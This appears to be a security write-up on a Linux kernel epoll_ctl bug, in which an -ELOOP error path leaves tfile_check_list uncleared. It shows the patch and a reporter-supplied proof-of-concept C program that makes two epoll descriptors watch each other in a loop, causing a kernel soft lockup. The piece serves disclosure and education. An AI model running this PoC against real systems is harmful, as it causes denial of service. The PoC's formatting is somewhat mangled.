This vulnerability was reported by Yurij M. Plotnikov in an email to the LKML. The vulnerable code resides in fs/eventpoll.c, specifically in the code of the epoll_ctl(2) system call.



/*
 * The following function implements the controller interface for
 * the eventpoll file that enables the insertion/removal/change of
 * file descriptors inside the interest set.
 *
 * Excerpt only: "..." marks code elided from this listing. Returns the
 * value left in 'error' when one of the error labels is reached.
 */
SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,
		struct epoll_event __user *, event)
{
	int error;
	int did_lock_epmutex = 0;
	struct file *file, *tfile;
	struct eventpoll *ep;
	struct epitem *epi;
	struct epoll_event epds;

	/* The user's event is copied in only when ep_op_has_event(op) holds. */
	error = -EFAULT;
	if (ep_op_has_event(op) &&
	    copy_from_user(&epds, event, sizeof(struct epoll_event)))
		goto error_return;

	...

	if (op == EPOLL_CTL_ADD) {
		if (is_file_epoll(tfile)) {
			/*
			 * The target is itself an epoll file: fail with -ELOOP
			 * when ep_loop_check() returns non-zero. Note that this
			 * exit does not touch tfile_check_list.
			 */
			error = -ELOOP;
			if (ep_loop_check(ep, tfile) != 0)
				goto error_tgt_fput;
		} else
			list_add(&tfile->f_tfile_llink, &tfile_check_list);
	}

	...

error_tgt_fput:
	/* Drop epmutex only if it was taken earlier in the function. */
	if (did_lock_epmutex)
		mutex_unlock(&epmutex);

	fput(tfile);
error_fput:
	fput(file);
error_return:

	return error;
}

As you can see, if the opcode is ‘EPOLL_CTL_ADD’, it first checks whether the requested file is itself an epoll file by comparing its file operations pointer against ‘eventpoll_fops’, using the routine below.



/* Declared ahead of use so that the helper below can take its address. */
static const struct file_operations eventpoll_fops;

/*
 * Tell whether @f is an eventpoll file, i.e. whether its f_op pointer
 * refers to eventpoll_fops. Returns 1 on a match and 0 otherwise.
 */
static inline int is_file_epoll(struct file *f)
{
	const struct file_operations *fops = f->f_op;

	return fops == &eventpoll_fops;
}

If this check succeeds (that is, the target file is itself an epoll file), it sets ‘error’ to ‘-ELOOP’ and calls ep_loop_check(), which verifies that no closed loop or overly deep chain would be created by adding the passed epoll file. If ep_loop_check() returns non-zero, the code jumps to ‘error_tgt_fput’ to unlock and exit.

As Yurij M. Plotnikov pointed out, this error path does not clear ‘tfile_check_list’, which results in the file descriptors being left open. The fix was to add the missing call.



 		if (is_file_epoll(tfile)) {
 			error = -ELOOP;
-			if (ep_loop_check(ep, tfile) != 0)
+			if (ep_loop_check(ep, tfile) != 0) {
+				clear_tfile_check_list();
 				goto error_tgt_fput;
+			}
 		} else

And here is the code of the missing call:



/*
 * Empty tfile_check_list: unlink every file queued on it through its
 * f_tfile_llink member, then re-initialise the list head.
 */
static void clear_tfile_check_list(void)
{
	struct list_head *head = &tfile_check_list;
	struct file *entry;

	/* Detach entries from the front until the list is empty. */
	for (;;) {
		if (list_empty(head))
			break;

		entry = list_first_entry(head, struct file, f_tfile_llink);
		list_del_init(&entry->f_tfile_llink);
	}

	INIT_LIST_HEAD(head);
}

Finally, Yurij M. Plotnikov also provided a PoC code to reproduce a kernel soft lockup. Here is this code.



#include <netinet/in.h> #include <sys/epoll.h> #include <errno.h> int main () { struct sockaddr_in addr; struct epoll_event event; int epfd1, epfd2, sock; int rc; int i = 0; while (1) { printf("ITERATION %d

", ++i); epfd1 = epoll_create(1); printf("epoll_create() -> %d(%d)

", epfd1, errno); epfd2 = epoll_create(1); printf("epoll_create() -> %d(%d)

", epfd2, errno);

It enters a ‘while’ loop and opens two epoll file descriptors.



sock = socket(PF_INET, SOCK_STREAM, 0); printf("socket() -> %d(%d)

", sock, errno); addr.sin_family = AF_INET; addr.sin_port = 0; addr.sin_addr.s_addr = 0; rc = bind(sock, (struct sockaddr*)&addr, sizeof(addr)); printf("bind() -> %d(%d)

", rc, errno); rc = listen(sock, 1); printf("listen() -> %d(%d)

", rc, errno);

Next, it creates a socket, binds it, and makes it passive by invoking the listen(2) system call.



event.data.fd = sock; event.events = 0; rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, sock, &event); printf("epoll_ctl() -> %d(%d)

", rc, errno);

It then invokes the buggy system call to add the socket file descriptor to ‘epfd1’.



event.data.fd = epfd2; event.events = EPOLLIN; rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, epfd2, &event); printf("epoll_ctl() -> %d(%d)

", rc, errno); event.data.fd = epfd1; event.events = EPOLLIN; rc = epoll_ctl(epfd2, EPOLL_CTL_ADD, epfd1, &event); printf("epoll_ctl() -> %d(%d)

", rc, errno);

Then it adds each epoll file descriptor to the other: first ‘epfd2’ to ‘epfd1’, then ‘epfd1’ to ‘epfd2’.



rc = close(epfd1); printf("close(epfd1) -> %d(%d)

", rc, errno); rc = close(epfd2); printf("close(epfd2) -> %d(%d)

", rc, errno); rc = close(sock); printf("close(sock) -> %d(%d)

", rc, errno); sleep(1); printf("



"); } return 0; }

At the end of each iteration, it attempts to close all of the opened file descriptors and waits for one second before the next iteration.



As you can see, the last two calls to the epoll_ctl(2) system call pass epoll file descriptors that point to each other. This creates a loop, which makes the kernel reach the vulnerable code path, and since the file descriptors are not properly closed, it eventually leads to a kernel soft lockup after a couple of iterations.